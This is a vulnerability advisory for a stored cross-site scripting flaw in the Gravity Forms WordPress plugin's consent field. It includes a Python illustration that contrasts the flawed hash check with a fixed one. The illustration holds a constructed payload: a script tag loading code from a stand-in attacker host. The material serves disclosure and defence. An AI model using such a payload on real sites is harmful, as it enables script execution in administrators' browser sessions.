Stored Cross-Site Scripting Vulnerability in Gravity Forms Plugin for WordPress
CVE-2026-5113
7.2 HIGH
What is CVE-2026-5113?
The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in all versions up to and including 2.10.0 through the hidden inputs of its consent field. The consent field ships its label state to the browser as a hash in hidden inputs, and on submission the plugin checks whether the submitted value still matches that state. The check is flawed because it compares the stored hash against both the raw submitted value and a wp_kses()-sanitized copy of it, and treats a match on the sanitized copy as proof that the value is unchanged. An attacker can therefore append markup that wp_kses() strips entirely (a script tag, for example): the sanitized copy hashes to the original state and passes validation, while the raw value, which still carries the payload, is what gets stored with the entry. The injected script then executes when an administrator views the Entries List page, giving anyone who can submit the form script execution in an administrator's browser session. Since the affected range ends at 2.10.0, sites on that version or earlier should update to a later release; until then, consent-field values in stored entries should be treated as untrusted when rendered.
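The following is an added illustration of the flawed state check described above, not code from Gravity Forms itself. It models the consent field's hidden-input state with an HMAC over the label (the real plugin's hashing scheme is not shown on this page and is assumed here), uses a simplified allowlist tag filter as a stand-in for wp_kses(), and places the vulnerable comparison next to a corrected one. The label, secret and attacker payload are constructed for the example.

```python
import hashlib
import hmac
import re

# Constructed per-site secret keying the state hash. Assumption: the real
# plugin derives its hash differently; only the comparison logic matters here.
SITE_SECRET = b"constructed-site-secret"

# Stand-in allowlist for wp_kses(): tags not listed here are removed outright.
ALLOWED_TAGS = {"a", "strong", "em", "br"}
_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def kses_like(value: str) -> str:
    """Simplified stand-in for wp_kses(): drops any tag not on the allowlist.
    Like wp_kses(), it removes the tag markup but keeps text between tags."""
    return _TAG_RE.sub(
        lambda m: m.group(0) if m.group(1).lower() in ALLOWED_TAGS else "",
        value,
    )


def state_hash(value: str) -> str:
    """Hash that the form embeds in a hidden input alongside the label."""
    return hmac.new(SITE_SECRET, value.encode("utf-8"), hashlib.sha256).hexdigest()


def render_consent_field(label: str) -> dict:
    """What the form sends to the browser: the label and its state hash."""
    return {"label": label, "state": state_hash(label)}


def validate_vulnerable(submitted_label: str, expected_state: str):
    """Flawed check: a match on EITHER the raw value or its sanitized copy
    counts as 'unchanged', and the raw value is what gets stored.
    Returns the value that would be stored, or None if rejected."""
    if state_hash(submitted_label) == expected_state:
        return submitted_label
    if state_hash(kses_like(submitted_label)) == expected_state:
        # Sanitized copy matched, but the raw (still tainted) value is kept.
        return submitted_label
    return None


def validate_fixed(submitted_label: str, expected_state: str):
    """Corrected check: only the raw value may match the rendered state,
    and only a sanitized value is ever stored."""
    if state_hash(submitted_label) != expected_state:
        return None
    return kses_like(submitted_label)


def demo() -> dict:
    """Walk one legitimate and one malicious submission through both checks."""
    field = render_consent_field("I agree to the terms")
    # Constructed payload: a script tag with no text content, so the stand-in
    # wp_kses() strips it back to exactly the original label.
    payload = 'I agree to the terms<script src="https://attacker.example/x.js"></script>'
    return {
        "sanitized_payload": kses_like(payload),
        "vulnerable_stores": validate_vulnerable(payload, field["state"]),
        "fixed_stores": validate_fixed(payload, field["state"]),
        "fixed_accepts_legit": validate_fixed(field["label"], field["state"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable branch stores the raw payload because the sanitized copy hashed to the original state, which is exactly the condition that lets the script survive into the entry and fire on the Entries List page. The corrected check refuses any raw value that does not hash to the rendered state, so a consent value can only ever be the label the form shipped.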
Affected Version(s)
Gravity Forms 0 <= 2.10.0